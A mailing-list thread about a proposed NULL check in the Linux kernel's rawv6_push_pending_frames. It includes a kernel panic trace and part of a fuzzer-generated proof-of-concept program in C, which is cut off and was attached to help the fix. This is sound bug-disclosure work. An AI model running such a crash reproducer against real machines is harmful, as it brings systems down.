netdev.vger.kernel.org archive mirror
* net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
@ 2023-01-06 21:19 Kyle Zeng
  2023-01-06 22:55 ` Jakub Kicinski
  0 siblings, 1 reply; 10+ messages in thread
From: Kyle Zeng @ 2023-01-06 21:19 UTC
  To: davem; +Cc: yoshfuji, dsahern, edumazet, kuba, pabeni, netdev

The local variable csum_skb is initialized to NULL. It is possible that the skb_queue_walk loop
does not assign csum_skb to a real skb. After the loop, skb is set to csum_skb, which
means skb is set to NULL. When the skb is used later, a NULL pointer dereference occurs.
This patch catches that case and avoids the oops.

Signed-off-by: Kyle Zeng <zengyhkyle@gmail.com>
---
 net/ipv6/raw.c | 3 +++
 1 file changed, 3 insertions(+)

diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
index a06a9f847..982a8b77a 100644
--- a/net/ipv6/raw.c
+++ b/net/ipv6/raw.c
@@ -556,6 +556,9 @@ static int rawv6_push_pending_frames(struct sock *sk, struct flowi6 *fl6,
 		skb = csum_skb;
 	}
 
+	if (skb == NULL)
+		goto out;
+
 	offset += skb_transport_offset(skb);
 	err = skb_copy_bits(skb, offset, &csum, 2);
 	if (err < 0) {
-- 
2.34.1



* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-06 21:19 net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames Kyle Zeng
@ 2023-01-06 22:55 ` Jakub Kicinski
  2023-01-06 23:12   ` Kyle Zeng
  0 siblings, 1 reply; 10+ messages in thread
From: Jakub Kicinski @ 2023-01-06 22:55 UTC
  To: Kyle Zeng; +Cc: davem, yoshfuji, dsahern, edumazet, pabeni, netdev

On Fri, 6 Jan 2023 14:19:52 -0700 Kyle Zeng wrote:
> It is possible that the skb_queue_walk loop does not assign csum_skb to a real skb.

Not immediately obvious to me how that could happen given prior checks
in this function.


* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-06 22:55 ` Jakub Kicinski
@ 2023-01-06 23:12   ` Kyle Zeng
  2023-01-06 23:57     ` Jakub Kicinski
  2023-01-09  8:45     ` Eric Dumazet
  0 siblings, 2 replies; 10+ messages in thread
From: Kyle Zeng @ 2023-01-06 23:12 UTC
  To: Jakub Kicinski; +Cc: davem, yoshfuji, dsahern, edumazet, pabeni, netdev

Hi Jakub,

The null dereference can happen if every iteration of the loop enters
the `if (offset >= len) {` branch and hits `continue` without ever
running `csum_skb = skb`.
A crash report is attached to this email.
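
The scenario can be sketched in user space as follows. This is a simplified model, not the kernel code: `struct fake_skb`, `find_csum_skb()` and `csum_skb_len_or_error()` are hypothetical names, and only the "skip buffers that end before the offset" logic is reproduced.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-in for struct sk_buff: only the payload length is modeled. */
struct fake_skb {
	int len;                 /* payload bytes held by this buffer */
	struct fake_skb *next;   /* next buffer in the queue, NULL at the end */
};

/*
 * Find the buffer that contains byte `offset` of the queued payload.
 * A buffer that ends before `offset` is skipped with `continue`, so when
 * `offset` is at or past the total queued length, every iteration takes
 * that branch and the result stays NULL.
 */
static struct fake_skb *find_csum_skb(struct fake_skb *head, int offset)
{
	struct fake_skb *csum_skb = NULL;
	struct fake_skb *skb;

	assert(offset >= 0);
	for (skb = head; skb; skb = skb->next) {
		if (csum_skb)
			continue;        /* already found, keep walking */
		if (offset >= skb->len) {
			offset -= skb->len;
			continue;        /* target byte is not in this buffer */
		}
		csum_skb = skb;
	}
	return csum_skb;
}

/* Guarded use, in the spirit of the proposed check: bail out on NULL. */
static int csum_skb_len_or_error(struct fake_skb *head, int offset)
{
	struct fake_skb *skb = find_csum_skb(head, offset);

	if (!skb)
		return -1;           /* no buffer contains the offset */
	return skb->len;
}
```

With two queued buffers of 8 bytes each, an offset of 10 resolves to the second buffer, while an offset of 20 skips both and leaves the result NULL, which is the case the guard is meant to catch.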

Best,
Kyle Zeng

=============================================
[    7.203616] BUG: kernel NULL pointer dereference, address: 00000000000000b2
[    7.205204] #PF: supervisor read access in kernel mode
[    7.206448] #PF: error_code(0x0000) - not-present page
[    7.207630] PGD 88d0067 P4D 88d0067 PUD 79af067 PMD 0
[    7.208060] Oops: 0000 [#1] SMP NOPTI
[    7.208343] CPU: 1 PID: 1846 Comm: poc Not tainted 5.10.133 #39
[    7.208816] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[    7.209489] RIP: 0010:rawv6_push_pending_frames+0x96/0x1e0
[    7.209934] Code: 00 00 8d 57 ff 39 d0 0f 8d bc 00 00 00 48 89 7c 24 08 41 83 bc 24 d0 01 00 00 01 0f 85 b8 00 00 00 8b a9 88 00 00 00 48 89 cb <44> 0f b7 ab b2 00 00 00 44 03 ab c0 00 00 00 44 2b ab c8 00 00 00
[    7.211433] RSP: 0018:ffffc90003487b10 EFLAGS: 00010246
[    7.211859] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: ffff8880064101c0
[    7.212410] RDX: 00000000000003c0 RSI: ffff8880064101c0 RDI: 00000000090e5840
[    7.212992] RBP: 00000000479c45b8 R08: 0000000000000000 R09: ffff8880064101a4
[    7.213559] R10: ffff8880064103d0 R11: ffff888006524b00 R12: ffff888006410000
[    7.214106] R13: ffffc90003487c10 R14: ffffc90003487c10 R15: 0000000000000000
[    7.214653] FS:  00000000017e03c0(0000) GS:ffff88803ec80000(0000) knlGS:0000000000000000
[    7.215272] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    7.215769] CR2: 00000000000000b2 CR3: 0000000009068006 CR4: 0000000000770ee0
[    7.216318] PKRU: 55555554
[    7.216532] Call Trace:
[    7.216744]  rawv6_sendmsg+0x72c/0x7d0
[    7.217041]  kernel_sendmsg+0x7a/0x90
[    7.217325]  sock_no_sendpage+0xc1/0xe0
[    7.217644]  kernel_sendpage+0xa3/0xe0
[    7.217945]  sock_sendpage+0x23/0x30
[    7.218224]  pipe_to_sendpage+0x76/0xa0
[    7.218529]  __splice_from_pipe+0xe5/0x200
[    7.218870]  ? generic_splice_sendpage+0xa0/0xa0
[    7.219263]  generic_splice_sendpage+0x72/0xa0
[    7.219650]  do_splice+0x4ad/0x780
[    7.219928]  __se_sys_splice+0x162/0x210
[    7.220231]  do_syscall_64+0x31/0x40
[    7.220518]  entry_SYSCALL_64_after_hwframe+0x61/0xc6
[    7.220944] RIP: 0033:0x47656d
[    7.221189] Code: c3 e8 47 28 00 00 0f 1f 80 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
[    7.222645] RSP: 002b:00007ffd36d11668 EFLAGS: 00000216 ORIG_RAX: 0000000000000113
[    7.223266] RAX: ffffffffffffffda RBX: 000000002000102f RCX: 000000000047656d
[    7.223860] RDX: 0000000000000007 RSI: 0000000000000000 RDI: 0000000000000005
[    7.224414] RBP: 00007ffd36d116a0 R08: 000000000804ffe2 R09: 0000000000000000
[    7.224986] R10: 0000000000000000 R11: 0000000000000216 R12: 0000000000000001
[    7.225546] R13: 00007ffd36d118d8 R14: 00000000005026c0 R15: 0000000000000002
[    7.226112] Modules linked in:
[    7.226350] CR2: 00000000000000b2
[    7.226613] ---[ end trace 5d56aba11d09b665 ]---
[    7.226993] RIP: 0010:rawv6_push_pending_frames+0x96/0x1e0
[    7.227442] Code: 00 00 8d 57 ff 39 d0 0f 8d bc 00 00 00 48 89 7c 24 08 41 83 bc 24 d0 01 00 00 01 0f 85 b8 00 00 00 8b a9 88 00 00 00 48 89 cb <44> 0f b7 ab b2 00 00 00 44 03 ab c0 00 00 00 44 2b ab c8 00 00 00
[    7.228918] RSP: 0018:ffffc90003487b10 EFLAGS: 00010246
[    7.229322] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: ffff8880064101c0
[    7.229880] RDX: 00000000000003c0 RSI: ffff8880064101c0 RDI: 00000000090e5840
[    7.230516] RBP: 00000000479c45b8 R08: 0000000000000000 R09: ffff8880064101a4
[    7.231112] R10: ffff8880064103d0 R11: ffff888006524b00 R12: ffff888006410000
[    7.231687] R13: ffffc90003487c10 R14: ffffc90003487c10 R15: 0000000000000000
[    7.232912] FS:  00000000017e03c0(0000) GS:ffff88803ec80000(0000) knlGS:0000000000000000
[    7.232912] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    7.233376] CR2: 00000000000000b2 CR3: 0000000009068006 CR4: 0000000000770ee0
[    7.233958] PKRU: 55555554
[    7.234170] Kernel panic - not syncing: Fatal exception
[    7.234762] Kernel Offset: disabled
[    7.235062] Rebooting in 1000 seconds..
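
The fault address can be read off the register dump above: RBX is 0, CR2 is 0xb2, and the faulting instruction bytes (`<44> 0f b7 ab b2 00 00 00`) decode to a 16-bit load from 0xb2(%rbx). That is the usual signature of a field read through a NULL struct pointer. A minimal sketch, assuming a hypothetical struct whose padding is chosen only to place a 16-bit field at offset 0xb2; the field name `transport_header` is an assumption based on skb_transport_offset() being the first use of skb after the loop, and the layout is not the real struct sk_buff:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Hypothetical layout, NOT the real struct sk_buff: the padding is chosen
 * only so that a 16-bit field lands at offset 0xb2, matching the log.
 */
struct skb_layout_model {
	unsigned char pad[0xb2];
	uint16_t transport_header;
};

static_assert(offsetof(struct skb_layout_model, transport_header) == 0xb2,
	      "field must sit at the offset seen in CR2");

/* Address that a load of base->transport_header would touch. */
static uintptr_t field_address(uintptr_t base)
{
	return base + offsetof(struct skb_layout_model, transport_header);
}
```

Calling `field_address(0)` yields 0xb2, the same value reported in CR2, which is why a small non-zero fault address still points at a NULL base pointer.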

On Fri, Jan 6, 2023 at 3:55 PM Jakub Kicinski <kuba@kernel.org> wrote:
>
> On Fri, 6 Jan 2023 14:19:52 -0700 Kyle Zeng wrote:
> > It is possible that the skb_queue_walk loop does not assign csum_skb to a real skb.
>
> Not immediately obvious to me how that could happen given prior checks
> in this function.


* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-06 23:12   ` Kyle Zeng
@ 2023-01-06 23:57     ` Jakub Kicinski
  2023-01-08 22:09       ` Kyle Zeng
  2023-01-09  8:45     ` Eric Dumazet
  1 sibling, 1 reply; 10+ messages in thread
From: Jakub Kicinski @ 2023-01-06 23:57 UTC
  To: Kyle Zeng; +Cc: davem, yoshfuji, dsahern, edumazet, pabeni, netdev

On Fri, 6 Jan 2023 16:12:25 -0700 Kyle Zeng wrote:
> Hi Jakub,
> 
> The null dereference can happen if every iteration of the loop enters
> the `if (offset >= len) {` branch and hits `continue` without ever
> running `csum_skb = skb`.
> A crash report is attached to this email.

I see, please include the stack trace in the commit message in the
future. Do you have a repro for this stack trace?

We check the offset against total (cork) length early in the function
so maybe the accounting goes wrong somewhere or there is some integer
overflow problem?

Reminder: please don't top post on the kernel mailing lists.

> =============================================
> [    7.203616] BUG: kernel NULL pointer dereference, address: 00000000000000b2
> [    7.205204] #PF: supervisor read access in kernel mode
> [    7.206448] #PF: error_code(0x0000) - not-present page
> [    7.207630] PGD 88d0067 P4D 88d0067 PUD 79af067 PMD 0
> [    7.208060] Oops: 0000 [#1] SMP NOPTI
> [    7.208343] CPU: 1 PID: 1846 Comm: poc Not tainted 5.10.133 #39

> [    7.208816] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
> [    7.209489] RIP: 0010:rawv6_push_pending_frames+0x96/0x1e0
> [    7.209934] Code: 00 00 8d 57 ff 39 d0 0f 8d bc 00 00 00 48 89 7c 24 08 41 83 bc 24 d0 01 00 00 01 0f 85 b8 00 00 00 8b a9 88 00 00 00 48 89 cb <44> 0f b7 ab b2 00 00 00 44 03 ab c0 00 00 00 44 2b ab c8 00 00 00
> [    7.211433] RSP: 0018:ffffc90003487b10 EFLAGS: 00010246
> [    7.211859] RAX: 00000000000000d8 RBX: 0000000000000000 RCX: ffff8880064101c0
> [    7.212410] RDX: 00000000000003c0 RSI: ffff8880064101c0 RDI: 00000000090e5840
> [    7.212992] RBP: 00000000479c45b8 R08: 0000000000000000 R09: ffff8880064101a4
> [    7.213559] R10: ffff8880064103d0 R11: ffff888006524b00 R12: ffff888006410000
> [    7.214106] R13: ffffc90003487c10 R14: ffffc90003487c10 R15: 0000000000000000
> [    7.214653] FS:  00000000017e03c0(0000) GS:ffff88803ec80000(0000) knlGS:0000000000000000
> [    7.215272] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
> [    7.215769] CR2: 00000000000000b2 CR3: 0000000009068006 CR4: 0000000000770ee0
> [    7.216318] PKRU: 55555554
> [    7.216532] Call Trace:
> [    7.216744]  rawv6_sendmsg+0x72c/0x7d0
> [    7.217041]  kernel_sendmsg+0x7a/0x90
> [    7.217325]  sock_no_sendpage+0xc1/0xe0
> [    7.217644]  kernel_sendpage+0xa3/0xe0
> [    7.217945]  sock_sendpage+0x23/0x30
> [    7.218224]  pipe_to_sendpage+0x76/0xa0
> [    7.218529]  __splice_from_pipe+0xe5/0x200
> [    7.218870]  ? generic_splice_sendpage+0xa0/0xa0
> [    7.219263]  generic_splice_sendpage+0x72/0xa0
> [    7.219650]  do_splice+0x4ad/0x780
> [    7.219928]  __se_sys_splice+0x162/0x210
> [    7.220231]  do_syscall_64+0x31/0x40
> [    7.220518]  entry_SYSCALL_64_after_hwframe+0x61/0xc6
> [    7.220944] RIP: 0033:0x47656d
> [    7.221189] Code: c3 e8 47 28 00 00 0f 1f 80 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48
> [    7.222645] RSP: 002b:00007ffd36d11668 EFLAGS: 00000216 ORIG_RAX: 0000000000000113
> [    7.223266] RAX: ffffffffffffffda RBX: 000000002000102f RCX: 000000000047656d
> [    7.223860] RDX: 0000000000000007 RSI: 0000000000000000 RDI: 0000000000000005
> [    7.224414] RBP: 00007ffd36d116a0 R08: 000000000804ffe2 R09: 0000000000000000
> [    7.224986] R10: 0000000000000000 R11: 0000000000000216 R12: 0000000000000001
> [    7.225546] R13: 00007ffd36d118d8 R14: 00000000005026c0 R15: 0000000000000002
> [    7.226112] Modules linked in:
> [    7.226350] CR2: 00000000000000b2



* Re: net: ipv6: raw: fixes null pointer deference in rawv6_push_pending_frames
  2023-01-06 23:57     ` Jakub Kicinski
@ 2023-01-08 22:09       ` Kyle Zeng
  0 siblings, 0 replies; 10+ messages in thread
From: Kyle Zeng @ 2023-01-08 22:09 UTC
  To: Jakub Kicinski; +Cc: davem, yoshfuji, dsahern, edumazet, pabeni, netdev

> Reminder: please don't top post on the kernel mailing lists.
Sorry about that, I will try to avoid doing that in the future.

> I see, please include the stack trace in the commit message in the
> future. Do you have a repro for this stack trace?
Yes, I have a reproducer for this bug. However, it was automatically
generated by a fuzzer and is not very readable. Due to my limited
understanding of the network stack, I was unable to minimize it or
find the actual root cause of the accounting issue. The raw crash
PoC is attached to this email.
The program needs to be run as root or in a network namespace to
trigger the bug.

=============================================
// autogenerated by syzkaller (https://github.com/google/syzkaller)

#define _GNU_SOURCE

#include <arpa/inet.h>
#include <dirent.h>
#include <endian.h>
#include <errno.h>
#include <fcntl.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <netinet/in.h>
#include <sched.h>
#include <signal.h>
#include <stdarg.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mount.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>

#include <linux/capability.h>
#include <linux/genetlink.h>
#include <linux/if_addr.h>
#include <linux/if_ether.h>
#include <linux/if_link.h>
#include <linux/if_tun.h>
#include <linux/in6.h>
#include <linux/ip.h>
#include <linux/neighbour.h>
#include <linux/net.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/tcp.h>
#include <linux/veth.h>

static unsigned long long procid;

static void sleep_ms(uint64_t ms)
{
	usleep(ms * 1000);
}

static uint64_t current_time_ms(void)
{
	struct timespec ts;
	if (clock_gettime(CLOCK_MONOTONIC, &ts))
		exit(1);
	return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}

static bool write_file(const char* file, const char* what, ...)
{
	char buf[1024];
	va_list args;
	va_start(args, what);
	vsnprintf(buf, sizeof(buf), what, args);
	va_end(args);
	buf[sizeof(buf) - 1] = 0;
	int len = strlen(buf);
	int fd = open(file, O_WRONLY | O_CLOEXEC);
	if (fd == -1)
		return false;
	if (write(fd, buf, len) != len) {
		int err = errno;
		close(fd);
		errno = err;
		return false;
	}
	close(fd);
	return true;
}

struct nlmsg {
	char* pos;
	int nesting;
	struct nlattr* nested[8];
	char buf[4096];
};

static void netlink_init(struct nlmsg* nlmsg, int typ, int flags,
			 const void* data, int size)
{
	memset(nlmsg, 0, sizeof(*nlmsg));
	struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf;
	hdr->nlmsg_type = typ;
	hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags;
	memcpy(hdr + 1, data, size);
	nlmsg->pos = (char*)(hdr + 1) + NLMSG_ALIGN(size);
}

static void netlink_attr(struct nlmsg* nlmsg, int typ,
			 const void* data, int size)
{
	struct nlattr* attr = (struct nlattr*)nlmsg->pos;
	attr->nla_len = sizeof(*attr) + size;
	attr->nla_type = typ;
	if (size > 0)
		memcpy(attr + 1, data, size);
	nlmsg->pos += NLMSG_ALIGN(attr->nla_len);
}

static void netlink_nest(struct nlmsg* nlmsg, int typ)
{
	struct nlattr* attr = (struct nlattr*)nlmsg->pos;
	attr->nla_type = typ;
	nlmsg->pos += sizeof(*attr);
	nlmsg->nested[nlmsg->nesting++] = attr;
}

static void netlink_done(struct nlmsg* nlmsg)
{
	struct nlattr* attr = nlmsg->nested[--nlmsg->nesting];
	attr->nla_len = nlmsg->pos - (char*)attr;
}

static int netlink_send_ext(struct nlmsg* nlmsg, int sock,
			    uint16_t reply_type, int* reply_len, bool dofail)
{
	if (nlmsg->pos > nlmsg->buf + sizeof(nlmsg->buf) || nlmsg->nesting)
		exit(1);
	struct nlmsghdr* hdr = (struct nlmsghdr*)nlmsg->buf;
	hdr->nlmsg_len = nlmsg->pos - nlmsg->buf;
	struct sockaddr_nl addr;
	memset(&addr, 0, sizeof(addr));
	addr.nl_family = AF_NETLINK;
	ssize_t n = sendto(sock, nlmsg->buf, hdr->nlmsg_len, 0, (struct sockaddr*)&addr, sizeof(addr));
	if (n != (ssize_t)hdr->nlmsg_len) {
		if (dofail)
			exit(1);
		return -1;
	}
	n = recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
	if (reply_len)
		*reply_len = 0;
	if (n < 0) {
		if (dofail)
			exit(1);
		return -1;
	}
	if (n < (ssize_t)sizeof(struct nlmsghdr)) {
		errno = EINVAL;
		if (dofail)
			exit(1);
		return -1;
	}
	if (hdr->nlmsg_type == NLMSG_DONE)
		return 0;
	if (reply_len && hdr->nlmsg_type == reply_type) {
		*reply_len = n;
		return 0;
	}
	if (n < (ssize_t)(sizeof(struct nlmsghdr) + sizeof(struct nlmsgerr))) {
		errno = EINVAL;
		if (dofail)
			exit(1);
		return -1;
	}
	if (hdr->nlmsg_type != NLMSG_ERROR) {
		errno = EINVAL;
		if (dofail)
			exit(1);
		return -1;
	}
	errno = -((struct nlmsgerr*)(hdr + 1))->error;
	return -errno;
}

static int netlink_send(struct nlmsg* nlmsg, int sock)
{
	return netlink_send_ext(nlmsg, sock, 0, NULL, true);
}

static int netlink_query_family_id(struct nlmsg* nlmsg, int sock, const char* family_name, bool dofail)
{
	struct genlmsghdr genlhdr;
	memset(&genlhdr, 0, sizeof(genlhdr));
	genlhdr.cmd = CTRL_CMD_GETFAMILY;
	netlink_init(nlmsg, GENL_ID_CTRL, 0, &genlhdr, sizeof(genlhdr));
	netlink_attr(nlmsg, CTRL_ATTR_FAMILY_NAME, family_name, strnlen(family_name, GENL_NAMSIZ - 1) + 1);
	int n = 0;
	int err = netlink_send_ext(nlmsg, sock, GENL_ID_CTRL, &n, dofail);
	if (err < 0) {
		return -1;
	}
	uint16_t id = 0;
	struct nlattr* attr = (struct nlattr*)(nlmsg->buf + NLMSG_HDRLEN + NLMSG_ALIGN(sizeof(genlhdr)));
	for (; (char*)attr < nlmsg->buf + n; attr = (struct nlattr*)((char*)attr + NLMSG_ALIGN(attr->nla_len))) {
		if (attr->nla_type == CTRL_ATTR_FAMILY_ID) {
			id = *(uint16_t*)(attr + 1);
			break;
		}
	}
	if (!id) {
		errno = EINVAL;
		return -1;
	}
	recv(sock, nlmsg->buf, sizeof(nlmsg->buf), 0);
	return id;
}

static int netlink_next_msg(struct nlmsg* nlmsg, unsigned int offset,
			    unsigned int total_len)
{
	struct nlmsghdr* hdr = (struct nlmsghdr*)(nlmsg->buf + offset);
	if (offset == total_len || offset + hdr->nlmsg_len > total_len)
		return -1;
	return hdr->nlmsg_len;
}

static void netlink_add_device_impl(struct nlmsg* nlmsg, const char* type,
				    const char* name)
{
	struct ifinfomsg hdr;
	memset(&hdr, 0, sizeof(hdr));
	netlink_init(nlmsg, RTM_NEWLINK, NLM_F_EXCL | NLM_F_CREATE, &hdr, sizeof(hdr));
	if (name)
		netlink_attr(nlmsg, IFLA_IFNAME, name, strlen(name));
	netlink_nest(nlmsg, IFLA_LINKINFO);
	netlink_attr(nlmsg, IFLA_INFO_KIND, type, strlen(type));
}

static void netlink_add_device(struct nlmsg* nlmsg, int sock, const char* type,
			       const char* name)
{
	netlink_add_device_impl(nlmsg, type, name);
	netlink_done(nlmsg);
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_veth(struct nlmsg* nlmsg, int sock, const char* name,
			     const char* peer)
{
	netlink_add_device_impl(nlmsg, "veth", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	netlink_nest(nlmsg, VETH_INFO_PEER);
	nlmsg->pos += sizeof(struct ifinfomsg);
	netlink_attr(nlmsg, IFLA_IFNAME, peer, strlen(peer));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_hsr(struct nlmsg* nlmsg, int sock, const char* name,
			    const char* slave1, const char* slave2)
{
	netlink_add_device_impl(nlmsg, "hsr", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	int ifindex1 = if_nametoindex(slave1);
	netlink_attr(nlmsg, IFLA_HSR_SLAVE1, &ifindex1, sizeof(ifindex1));
	int ifindex2 = if_nametoindex(slave2);
	netlink_attr(nlmsg, IFLA_HSR_SLAVE2, &ifindex2, sizeof(ifindex2));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_linked(struct nlmsg* nlmsg, int sock, const char* type, const char* name, const char* link)
{
	netlink_add_device_impl(nlmsg, type, name);
	netlink_done(nlmsg);
	int ifindex = if_nametoindex(link);
	netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_vlan(struct nlmsg* nlmsg, int sock, const char* name, const char* link, uint16_t id, uint16_t proto)
{
	netlink_add_device_impl(nlmsg, "vlan", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	netlink_attr(nlmsg, IFLA_VLAN_ID, &id, sizeof(id));
	netlink_attr(nlmsg, IFLA_VLAN_PROTOCOL, &proto, sizeof(proto));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int ifindex = if_nametoindex(link);
	netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_macvlan(struct nlmsg* nlmsg, int sock, const char* name, const char* link)
{
	netlink_add_device_impl(nlmsg, "macvlan", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	uint32_t mode = MACVLAN_MODE_BRIDGE;
	netlink_attr(nlmsg, IFLA_MACVLAN_MODE, &mode, sizeof(mode));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int ifindex = if_nametoindex(link);
	netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_add_geneve(struct nlmsg* nlmsg, int sock, const char* name, uint32_t vni, struct in_addr* addr4, struct in6_addr* addr6)
{
	netlink_add_device_impl(nlmsg, "geneve", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	netlink_attr(nlmsg, IFLA_GENEVE_ID, &vni, sizeof(vni));
	if (addr4)
		netlink_attr(nlmsg, IFLA_GENEVE_REMOTE, addr4, sizeof(*addr4));
	if (addr6)
		netlink_attr(nlmsg, IFLA_GENEVE_REMOTE6, addr6, sizeof(*addr6));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

#define IFLA_IPVLAN_FLAGS 2
#define IPVLAN_MODE_L3S 2
#undef IPVLAN_F_VEPA
#define IPVLAN_F_VEPA 2

static void netlink_add_ipvlan(struct nlmsg* nlmsg, int sock, const char* name, const char* link, uint16_t mode, uint16_t flags)
{
	netlink_add_device_impl(nlmsg, "ipvlan", name);
	netlink_nest(nlmsg, IFLA_INFO_DATA);
	netlink_attr(nlmsg, IFLA_IPVLAN_MODE, &mode, sizeof(mode));
	netlink_attr(nlmsg, IFLA_IPVLAN_FLAGS, &flags, sizeof(flags));
	netlink_done(nlmsg);
	netlink_done(nlmsg);
	int ifindex = if_nametoindex(link);
	netlink_attr(nlmsg, IFLA_LINK, &ifindex, sizeof(ifindex));
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static void netlink_device_change(struct nlmsg* nlmsg, int sock, const char* name, bool up,
				  const char* master, const void* mac, int macsize,
				  const char* new_name)
{
	struct ifinfomsg hdr;
	memset(&hdr, 0, sizeof(hdr));
	if (up)
		hdr.ifi_flags = hdr.ifi_change = IFF_UP;
	hdr.ifi_index = if_nametoindex(name);
	netlink_init(nlmsg, RTM_NEWLINK, 0, &hdr, sizeof(hdr));
	if (new_name)
		netlink_attr(nlmsg, IFLA_IFNAME, new_name, strlen(new_name));
	if (master) {
		int ifindex = if_nametoindex(master);
		netlink_attr(nlmsg, IFLA_MASTER, &ifindex, sizeof(ifindex));
	}
	if (macsize)
		netlink_attr(nlmsg, IFLA_ADDRESS, mac, macsize);
	int err = netlink_send(nlmsg, sock);
	if (err < 0) {
	}
}

static int netlink_add_addr(struct nlmsg* nlmsg, int sock, const char* dev,
			    const void* addr, int addrsize)
{
	struct ifaddrmsg hdr;
	memset(&hdr, 0, sizeof(hdr));
	hdr.ifa_family = addrsize == 4 ? AF_INET : AF_INET6;
	hdr.ifa_prefixlen = addrsize == 4 ? 24 : 120;
	hdr.ifa_scope = RT_SCOPE_UNIVERSE;
	hdr.ifa_index = if_nametoindex(dev);
	netlink_init(nlmsg, RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE, &hdr, sizeof(hdr));
	netlink_attr(nlmsg, IFA_LOCAL, addr, addrsize);
	netlink_attr(nlmsg, IFA_ADDRESS, addr, addrsize);
	return netlink_send(nlmsg, sock);
}

static void netlink_add_addr4(struct nlmsg* nlmsg, int sock,
			      const char* dev, const char* addr)
{
	struct in_addr in_addr;
	inet_pton(AF_INET, addr, &in_addr);
	int err = netlink_add_addr(nlmsg, sock, dev, &in_addr, sizeof(in_addr));
	if (err < 0) {
	}
}

static void netlink_add_addr6(struct nlmsg* nlmsg, int sock,
			      const char* dev, const char* addr)
{
	struct in6_addr in6_addr;
	inet_pton(AF_INET6, addr, &in6_addr);
	int err = netlink_add_addr(nlmsg, sock, dev, &in6_addr, sizeof(in6_addr));
	if (err < 0) {
	}
}

static struct nlmsg nlmsg;

#define DEVLINK_FAMILY_NAME "devlink"

#define DEVLINK_CMD_PORT_GET 5
#define DEVLINK_ATTR_BUS_NAME 1
#define DEVLINK_ATTR_DEV_NAME 2
#define DEVLINK_ATTR_NETDEV_NAME 7

static struct nlmsg nlmsg2;

static void initialize_devlink_ports(const char* bus_name, const char* dev_name,
				     const char* netdev_prefix)
{
	struct genlmsghdr genlhdr;
	int len, total_len, id, err, offset;
	uint16_t netdev_index;
	int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
	if (sock == -1)
		exit(1);
	int rtsock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
	if (rtsock == -1)
		exit(1);
	id = netlink_query_family_id(&nlmsg, sock, DEVLINK_FAMILY_NAME, true);
	if (id == -1)
		goto error;
	memset(&genlhdr, 0, sizeof(genlhdr));
	genlhdr.cmd = DEVLINK_CMD_PORT_GET;
	netlink_init(&nlmsg, id, NLM_F_DUMP, &genlhdr, sizeof(genlhdr));
	netlink_attr(&nlmsg, DEVLINK_ATTR_BUS_NAME, bus_name, strlen(bus_name) + 1);
	netlink_attr(&nlmsg, DEVLINK_ATTR_DEV_NAME, dev_name, strlen(dev_name) + 1);
